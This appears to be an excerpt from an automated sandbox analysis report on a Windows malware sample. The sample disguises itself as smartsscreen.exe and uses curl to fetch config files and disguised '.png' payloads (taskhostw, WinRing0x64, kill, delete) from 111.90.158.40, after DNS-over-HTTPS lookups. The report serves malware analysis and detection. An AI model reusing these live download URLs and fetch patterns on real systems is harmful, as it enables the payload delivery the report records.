Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.158.40
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.158.40
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.158.40
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.158.40
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.158.40
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.158.40
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.158.40
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.158.40
Source: unknown	TCP traffic detected without corresponding DNS query: 93.95.225.137
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.158.40
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.158.40
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.158.40
Source: unknown	TCP traffic detected without corresponding DNS query: 93.95.225.137
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.158.40
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.158.40
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.158.40
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.158.40
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.158.40
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.158.40
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.158.40
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.158.40
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.158.40
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.158.40
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.158.40

Source: C:\Users\user\Desktop\curl.exe

Code function: 5_2_00416880 recv,WSAGetLastError,

5_2_00416880

Source: global traffic	HTTP traffic detected: GET /dns-query?name=download.yrnvtklot.com&type=A HTTP/1.1Host: 1.1.1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36Accept: application/dns-jsonAccept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /dns-query?name=online.yrnvtklot.com&type=A HTTP/1.1Host: 1.1.1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36Accept: application/dns-jsonAccept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /config.txt?t=1716985514 HTTP/1.1Host: 111.90.158.40:80User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36Content-Type: application/octet-streamAccept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /curl.png?t=1716985515 HTTP/1.1Host: 111.90.158.40:80User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36Content-Type: application/octet-streamAccept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /taskhostw.png?t=1716985523 HTTP/1.1User-Agent: curl/7.35.0Host: 111.90.158.40Accept: /
Source: global traffic	HTTP traffic detected: GET /config.json?t=1716985532 HTTP/1.1User-Agent: curl/7.35.0Host: 111.90.158.40Accept: /
Source: global traffic	HTTP traffic detected: GET /WinRing0x64.png?t=1716985534 HTTP/1.1User-Agent: curl/7.35.0Host: 111.90.158.40Accept: /
Source: global traffic	HTTP traffic detected: GET /drives/kill.png?t=1716985546 HTTP/1.1User-Agent: curl/7.35.0Host: 111.90.158.40Accept: /
Source: global traffic	HTTP traffic detected: GET /drives/delete.png?t=1716985552 HTTP/1.1User-Agent: curl/7.35.0Host: 111.90.158.40Accept: /

Source: curl.exe	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000005.00000000.1880782517.0000000000454000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000005.00000000.1880782517.0000000000454000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: BZEDZEQZESZEUsage: curl [options...] <url>Options: (H) means HTTP/HTTPS only, (F) means FTP only --anyauth Pick "any" authentication method (H) -a, --append Append to target file when uploading (F/SFTP) --basic Use HTTP Basic Authentication (H) --cacert FILE CA certificate to verify peer against (SSL) --capath DIR CA directory to verify peer against (SSL) -E, --cert CERT[:PASSWD] Client certificate file and password (SSL) --cert-type TYPE Certificate file type (DER/PEM/ENG) (SSL) --ciphers LIST SSL ciphers to use (SSL) --compressed Request compressed response (using deflate or gzip) -K, --config FILE Specify which config file to read --connect-timeout SECONDS Maximum time allowed for connection -C, --continue-at OFFSET Resumed transfer offset -b, --cookie STRING/FILE String or file to read cookies from (H) -c, --cookie-jar FILE Write cookies to this file after operation (H) --create-dirs Create necessary local directory hierarchy --crlf Convert LF to CRLF in upload --crlfile FILE Get a CRL list in PEM format from the given file -d, --data DATA HTTP POST data (H) --data-ascii DATA HTTP POST ASCII data (H) --data-binary DATA HTTP POST binary data (H) --data-urlencode DATA HTTP POST data url encoded (H) --delegation STRING GSS-API delegation permission --digest Use HTTP Digest Authentication (H) --disable-eprt Inhibit using EPRT or LPRT (F) --disable-epsv Inhibit using EPSV (F) --dns-servers DNS server addrs to use: 1.1.1.1;2.2.2.2 --dns-interface Interface to use for DNS requests --dns-ipv4-addr IPv4 address to use for DNS requests, dot notation --dns-ipv6-addr IPv6 address to use for DNS requests, dot notation -D, --dump-header FILE Write the headers to this file --egd-file FILE EGD socket path for random data (SSL) --engine ENGINE Crypto engine (SSL). "--engine list" for list -f, --fail Fail silently (no output at all) on HTTP errors (H) -F, --form CONTENT Specify HTTP multipart POST data (H) --form-string STRING Specify HTTP multipart POST data (H) --ftp-account DATA Account data string (F) --ftp-alternative-to-user COMMAND String to replace "USER [name]" (F) --ftp-create-dirs Create the remote dirs if not present (F) --ftp-method [MULTICWD/NOCWD/SINGLECWD] Control CWD usage (F) --ftp-pasv Use PASV/EPSV instead of PORT (F) -P, --ftp-port ADR Use PORT with given address instead of PASV (F) --ftp-skip-pasv-ip Skip the IP address for PASV (F)
Source: curl.exe, 0000000D.00000002.1984019338.0000000000454000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 0000000D.00000002.1984019338.0000000000454000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: BZEDZEQZESZEUsage: curl [options...] <url>Options: (H) means HTTP/HTTPS only, (F) means FTP only --anyauth Pick "any" authentication method (H) -a, --append Append to target file when uploading (F/SFTP) --basic Use HTTP Basic Authentication (H) --cacert FILE CA certificate to verify peer against (SSL) --capath DIR CA directory to verify peer against (SSL) -E, --cert CERT[:PASSWD] Client certificate file and password (SSL) --cert-type TYPE Certificate file type (DER/PEM/ENG) (SSL) --ciphers LIST SSL ciphers to use (SSL) --compressed Request compressed response (using deflate or gzip) -K, --config FILE Specify which config file to read --connect-timeout SECONDS Maximum time allowed for connection -C, --continue-at OFFSET Resumed transfer offset -b, --cookie STRING/FILE String or file to read cookies from (H) -c, --cookie-jar FILE Write cookies to this file after operation (H) --create-dirs Create necessary local directory hierarchy --crlf Convert LF to CRLF in upload --crlfile FILE Get a CRL list in PEM format from the given file -d, --data DATA HTTP POST data (H) --data-ascii DATA HTTP POST ASCII data (H) --data-binary DATA HTTP POST binary data (H) --data-urlencode DATA HTTP POST data url encoded (H) --delegation STRING GSS-API delegation permission --digest Use HTTP Digest Authentication (H) --disable-eprt Inhibit using EPRT or LPRT (F) --disable-epsv Inhibit using EPSV (F) --dns-servers DNS server addrs to use: 1.1.1.1;2.2.2.2 --dns-interface Interface to use for DNS requests --dns-ipv4-addr IPv4 address to use for DNS requests, dot notation --dns-ipv6-addr IPv6 address to use for DNS requests, dot notation -D, --dump-header FILE Write the headers to this file --egd-file FILE EGD socket path for random data (SSL) --engine ENGINE Crypto engine (SSL). "--engine list" for list -f, --fail Fail silently (no output at all) on HTTP errors (H) -F, --form CONTENT Specify HTTP multipart POST data (H) --form-string STRING Specify HTTP multipart POST data (H) --ftp-account DATA Account data string (F) --ftp-alternative-to-user COMMAND String to replace "USER [name]" (F) --ftp-create-dirs Create the remote dirs if not present (F) --ftp-method [MULTICWD/NOCWD/SINGLECWD] Control CWD usage (F) --ftp-pasv Use PASV/EPSV instead of PORT (F) -P, --ftp-port ADR Use PORT with given address instead of PASV (F) --ftp-skip-pasv-ip Skip the IP address for PASV (F)
Source: curl.exe, 0000000F.00000002.2015440744.0000000000454000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 0000000F.00000002.2015440744.0000000000454000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: BZEDZEQZESZEUsage: curl [options...] <url>Options: (H) means HTTP/HTTPS only, (F) means FTP only --anyauth Pick "any" authentication method (H) -a, --append Append to target file when uploading (F/SFTP) --basic Use HTTP Basic Authentication (H) --cacert FILE CA certificate to verify peer against (SSL) --capath DIR CA directory to verify peer against (SSL) -E, --cert CERT[:PASSWD] Client certificate file and password (SSL) --cert-type TYPE Certificate file type (DER/PEM/ENG) (SSL) --ciphers LIST SSL ciphers to use (SSL) --compressed Request compressed response (using deflate or gzip) -K, --config FILE Specify which config file to read --connect-timeout SECONDS Maximum time allowed for connection -C, --continue-at OFFSET Resumed transfer offset -b, --cookie STRING/FILE String or file to read cookies from (H) -c, --cookie-jar FILE Write cookies to this file after operation (H) --create-dirs Create necessary local directory hierarchy --crlf Convert LF to CRLF in upload --crlfile FILE Get a CRL list in PEM format from the given file -d, --data DATA HTTP POST data (H) --data-ascii DATA HTTP POST ASCII data (H) --data-binary DATA HTTP POST binary data (H) --data-urlencode DATA HTTP POST data url encoded (H) --delegation STRING GSS-API delegation permission --digest Use HTTP Digest Authentication (H) --disable-eprt Inhibit using EPRT or LPRT (F) --disable-epsv Inhibit using EPSV (F) --dns-servers DNS server addrs to use: 1.1.1.1;2.2.2.2 --dns-interface Interface to use for DNS requests --dns-ipv4-addr IPv4 address to use for DNS requests, dot notation --dns-ipv6-addr IPv6 address to use for DNS requests, dot notation -D, --dump-header FILE Write the headers to this file --egd-file FILE EGD socket path for random data (SSL) --engine ENGINE Crypto engine (SSL). "--engine list" for list -f, --fail Fail silently (no output at all) on HTTP errors (H) -F, --form CONTENT Specify HTTP multipart POST data (H) --form-string STRING Specify HTTP multipart POST data (H) --ftp-account DATA Account data string (F) --ftp-alternative-to-user COMMAND String to replace "USER [name]" (F) --ftp-create-dirs Create the remote dirs if not present (F) --ftp-method [MULTICWD/NOCWD/SINGLECWD] Control CWD usage (F) --ftp-pasv Use PASV/EPSV instead of PORT (F) -P, --ftp-port ADR Use PORT with given address instead of PASV (F) --ftp-skip-pasv-ip Skip the IP address for PASV (F)
Source: curl.exe, 00000015.00000000.2116851620.0000000000454000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000015.00000000.2116851620.0000000000454000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: BZEDZEQZESZEUsage: curl [options...] <url>Options: (H) means HTTP/HTTPS only, (F) means FTP only --anyauth Pick "any" authentication method (H) -a, --append Append to target file when uploading (F/SFTP) --basic Use HTTP Basic Authentication (H) --cacert FILE CA certificate to verify peer against (SSL) --capath DIR CA directory to verify peer against (SSL) -E, --cert CERT[:PASSWD] Client certificate file and password (SSL) --cert-type TYPE Certificate file type (DER/PEM/ENG) (SSL) --ciphers LIST SSL ciphers to use (SSL) --compressed Request compressed response (using deflate or gzip) -K, --config FILE Specify which config file to read --connect-timeout SECONDS Maximum time allowed for connection -C, --continue-at OFFSET Resumed transfer offset -b, --cookie STRING/FILE String or file to read cookies from (H) -c, --cookie-jar FILE Write cookies to this file after operation (H) --create-dirs Create necessary local directory hierarchy --crlf Convert LF to CRLF in upload --crlfile FILE Get a CRL list in PEM format from the given file -d, --data DATA HTTP POST data (H) --data-ascii DATA HTTP POST ASCII data (H) --data-binary DATA HTTP POST binary data (H) --data-urlencode DATA HTTP POST data url encoded (H) --delegation STRING GSS-API delegation permission --digest Use HTTP Digest Authentication (H) --disable-eprt Inhibit using EPRT or LPRT (F) --disable-epsv Inhibit using EPSV (F) --dns-servers DNS server addrs to use: 1.1.1.1;2.2.2.2 --dns-interface Interface to use for DNS requests --dns-ipv4-addr IPv4 address to use for DNS requests, dot notation --dns-ipv6-addr IPv6 address to use for DNS requests, dot notation -D, --dump-header FILE Write the headers to this file --egd-file FILE EGD socket path for random data (SSL) --engine ENGINE Crypto engine (SSL). "--engine list" for list -f, --fail Fail silently (no output at all) on HTTP errors (H) -F, --form CONTENT Specify HTTP multipart POST data (H) --form-string STRING Specify HTTP multipart POST data (H) --ftp-account DATA Account data string (F) --ftp-alternative-to-user COMMAND String to replace "USER [name]" (F) --ftp-create-dirs Create the remote dirs if not present (F) --ftp-method [MULTICWD/NOCWD/SINGLECWD] Control CWD usage (F) --ftp-pasv Use PASV/EPSV instead of PORT (F) -P, --ftp-port ADR Use PORT with given address instead of PASV (F) --ftp-skip-pasv-ip Skip the IP address for PASV (F)
Source: curl.exe, 0000001D.00000002.2192971081.0000000000454000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 0000001D.00000002.2192971081.0000000000454000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: BZEDZEQZESZEUsage: curl [options...] <url>Options: (H) means HTTP/HTTPS only, (F) means FTP only --anyauth Pick "any" authentication method (H) -a, --append Append to target file when uploading (F/SFTP) --basic Use HTTP Basic Authentication (H) --cacert FILE CA certificate to verify peer against (SSL) --capath DIR CA directory to verify peer against (SSL) -E, --cert CERT[:PASSWD] Client certificate file and password (SSL) --cert-type TYPE Certificate file type (DER/PEM/ENG) (SSL) --ciphers LIST SSL ciphers to use (SSL) --compressed Request compressed response (using deflate or gzip) -K, --config FILE Specify which config file to read --connect-timeout SECONDS Maximum time allowed for connection -C, --continue-at OFFSET Resumed transfer offset -b, --cookie STRING/FILE String or file to read cookies from (H) -c, --cookie-jar FILE Write cookies to this file after operation (H) --create-dirs Create necessary local directory hierarchy --crlf Convert LF to CRLF in upload --crlfile FILE Get a CRL list in PEM format from the given file -d, --data DATA HTTP POST data (H) --data-ascii DATA HTTP POST ASCII data (H) --data-binary DATA HTTP POST binary data (H) --data-urlencode DATA HTTP POST data url encoded (H) --delegation STRING GSS-API delegation permission --digest Use HTTP Digest Authentication (H) --disable-eprt Inhibit using EPRT or LPRT (F) --disable-epsv Inhibit using EPSV (F) --dns-servers DNS server addrs to use: 1.1.1.1;2.2.2.2 --dns-interface Interface to use for DNS requests --dns-ipv4-addr IPv4 address to use for DNS requests, dot notation --dns-ipv6-addr IPv6 address to use for DNS requests, dot notation -D, --dump-header FILE Write the headers to this file --egd-file FILE EGD socket path for random data (SSL) --engine ENGINE Crypto engine (SSL). "--engine list" for list -f, --fail Fail silently (no output at all) on HTTP errors (H) -F, --form CONTENT Specify HTTP multipart POST data (H) --form-string STRING Specify HTTP multipart POST data (H) --ftp-account DATA Account data string (F) --ftp-alternative-to-user COMMAND String to replace "USER [name]" (F) --ftp-create-dirs Create the remote dirs if not present (F) --ftp-method [MULTICWD/NOCWD/SINGLECWD] Control CWD usage (F) --ftp-pasv Use PASV/EPSV instead of PORT (F) -P, --ftp-port ADR Use PORT with given address instead of PASV (F) --ftp-skip-pasv-ip Skip the IP address for PASV (F)
Source: 8e77f5e1bc39c6408349bc8b0bfbe6cb.tmp.3.dr	String found in binary or memory: Usage: curl [options...] <url>
Source: 8e77f5e1bc39c6408349bc8b0bfbe6cb.tmp.3.dr	String found in binary or memory: BZEDZEQZESZEUsage: curl [options...] <url>Options: (H) means HTTP/HTTPS only, (F) means FTP only --anyauth Pick "any" authentication method (H) -a, --append Append to target file when uploading (F/SFTP) --basic Use HTTP Basic Authentication (H) --cacert FILE CA certificate to verify peer against (SSL) --capath DIR CA directory to verify peer against (SSL) -E, --cert CERT[:PASSWD] Client certificate file and password (SSL) --cert-type TYPE Certificate file type (DER/PEM/ENG) (SSL) --ciphers LIST SSL ciphers to use (SSL) --compressed Request compressed response (using deflate or gzip) -K, --config FILE Specify which config file to read --connect-timeout SECONDS Maximum time allowed for connection -C, --continue-at OFFSET Resumed transfer offset -b, --cookie STRING/FILE String or file to read cookies from (H) -c, --cookie-jar FILE Write cookies to this file after operation (H) --create-dirs Create necessary local directory hierarchy --crlf Convert LF to CRLF in upload --crlfile FILE Get a CRL list in PEM format from the given file -d, --data DATA HTTP POST data (H) --data-ascii DATA HTTP POST ASCII data (H) --data-binary DATA HTTP POST binary data (H) --data-urlencode DATA HTTP POST data url encoded (H) --delegation STRING GSS-API delegation permission --digest Use HTTP Digest Authentication (H) --disable-eprt Inhibit using EPRT or LPRT (F) --disable-epsv Inhibit using EPSV (F) --dns-servers DNS server addrs to use: 1.1.1.1;2.2.2.2 --dns-interface Interface to use for DNS requests --dns-ipv4-addr IPv4 address to use for DNS requests, dot notation --dns-ipv6-addr IPv6 address to use for DNS requests, dot notation -D, --dump-header FILE Write the headers to this file --egd-file FILE EGD socket path for random data (SSL) --engine ENGINE Crypto engine (SSL). "--engine list" for list -f, --fail Fail silently (no output at all) on HTTP errors (H) -F, --form CONTENT Specify HTTP multipart POST data (H) --form-string STRING Specify HTTP multipart POST data (H) --ftp-account DATA Account data string (F) --ftp-alternative-to-user COMMAND String to replace "USER [name]" (F) --ftp-create-dirs Create the remote dirs if not present (F) --ftp-method [MULTICWD/NOCWD/SINGLECWD] Control CWD usage (F) --ftp-pasv Use PASV/EPSV instead of PORT (F) -P, --ftp-port ADR Use PORT with given address instead of PASV (F) --ftp-skip-pasv-ip Skip the IP address for PASV (F)

Source: smartsscreen.exe	String found in binary or memory: http://%s:%s/config.txt?t=%dinvalid
Source: curl.exe, 0000000F.00000002.2016056803.00000000009D0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000F.00000002.2015885653.0000000000720000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000F.00000002.2016325642.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000F.00000002.2015939572.0000000000860000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://111.90.158.40:80/WinRing0x64.png?t=1716985534
Source: curl.exe, 0000000F.00000002.2016325642.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://111.90.158.40:80/WinRing0x64.png?t=1716985534-oC:
Source: curl.exe, 0000000F.00000002.2016325642.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://111.90.158.40:80/WinRing0x64.png?t=1716985534PRO#o
Source: curl.exe, 0000000D.00000002.1984202738.0000000000760000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.1983692782.0000000000130000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.1983830750.00000000001F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://111.90.158.40:80/config.json?t=1716985532
Source: curl.exe, 0000000D.00000002.1983830750.00000000001F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://111.90.158.40:80/config.json?t=1716985532-oC:
Source: curl.exe, 0000000D.00000002.1983830750.00000000001F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://111.90.158.40:80/config.json?t=1716985532CNUMBEH
Source: smartsscreen.exe, 00000000.00000003.3057190604.0000000000B73000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.3074979645.0000000000B73000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.2872213799.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.2385285722.0000000000B8F000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.2471710851.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.2402364679.0000000000B73000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.2724820614.0000000000B73000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.2872434476.0000000000B8F000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.2690602143.0000000000B73000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.2840500996.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.2953224662.0000000000B8F000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.2542878047.0000000000B8F000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.2817294659.0000000000B8F000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.2631824681.0000000000B73000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.2889144526.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.2836160513.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.3066509341.0000000000B73000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.2912107884.0000000000B8F000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.2413551629.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.2335072348.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.2695596562.0000000000B89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://111.90.158.40:80/drives/delete.png?t=1716985552
Source: curl.exe, 0000001D.00000002.2193308149.0000000000790000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://111.90.158.40:80/drives/delete.png?t=1716985552-oC:
Source: curl.exe, 0000001D.00000002.2193308149.0000000000790000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://111.90.158.40:80/drives/delete.png?t=1716985552i
Source: curl.exe, 00000015.00000002.2138753199.0000000000820000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://111.90.158.40:80/drives/kill.png?t=1716985546
Source: curl.exe, 00000015.00000002.2138912986.0000000000E60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://111.90.158.40:80/drives/kill.png?t=1716985546-oC:
Source: curl.exe, 00000015.00000002.2138912986.0000000000E60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://111.90.158.40:80/drives/kill.png?t=1716985546RS=v
Source: curl.exe, 00000005.00000002.1942098171.0000000000740000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://111.90.158.40:80/taskhostw.png?t=1716985523
Source: curl.exe, 00000005.00000002.1942238556.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000002.1942098171.000000000074E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://111.90.158.40:80/taskhostw.png?t=1716985523-oC:
Source: curl.exe, 00000005.00000002.1942238556.0000000000B30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://111.90.158.40:80/taskhostw.png?t=1716985523F_PRO
Source: expand.exe, 00000017.00000003.2151748117.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp, 0bfdc61464f46f4e9af5455e9b3ded61.tmp.23.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: expand.exe, 00000017.00000003.2151748117.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp, 0bfdc61464f46f4e9af5455e9b3ded61.tmp.23.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: expand.exe, 00000017.00000003.2151748117.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp, 0bfdc61464f46f4e9af5455e9b3ded61.tmp.23.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: expand.exe, 00000017.00000003.2151748117.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp, 0bfdc61464f46f4e9af5455e9b3ded61.tmp.23.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: expand.exe, 00000017.00000003.2151748117.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp, 0bfdc61464f46f4e9af5455e9b3ded61.tmp.23.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: expand.exe, 00000011.00000003.2034908138.0000000002AB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: expand.exe, 00000011.00000003.2034908138.0000000002AB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: expand.exe, 00000011.00000003.2034908138.0000000002AB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: expand.exe, 00000011.00000003.2034908138.0000000002AB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: expand.exe, 0000001F.00000003.2211860521.0000000002913000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: expand.exe, 00000017.00000003.2151748117.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp, 0bfdc61464f46f4e9af5455e9b3ded61.tmp.23.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: expand.exe, 00000017.00000003.2151748117.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp, 0bfdc61464f46f4e9af5455e9b3ded61.tmp.23.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: expand.exe, 00000017.00000003.2151748117.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp, 0bfdc61464f46f4e9af5455e9b3ded61.tmp.23.dr	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: expand.exe, 00000017.00000003.2151748117.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp, 0bfdc61464f46f4e9af5455e9b3ded61.tmp.23.dr	String found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: expand.exe, 00000017.00000003.2151748117.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp, 0bfdc61464f46f4e9af5455e9b3ded61.tmp.23.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: expand.exe, 00000017.00000003.2151748117.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp, 0bfdc61464f46f4e9af5455e9b3ded61.tmp.23.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: expand.exe, 00000017.00000003.2151748117.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp, 0bfdc61464f46f4e9af5455e9b3ded61.tmp.23.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: expand.exe, 00000017.00000003.2151748117.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp, 0bfdc61464f46f4e9af5455e9b3ded61.tmp.23.dr	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: expand.exe, 00000017.00000003.2151748117.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp, 0bfdc61464f46f4e9af5455e9b3ded61.tmp.23.dr	String found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: expand.exe, 00000017.00000003.2151748117.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp, 0bfdc61464f46f4e9af5455e9b3ded61.tmp.23.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
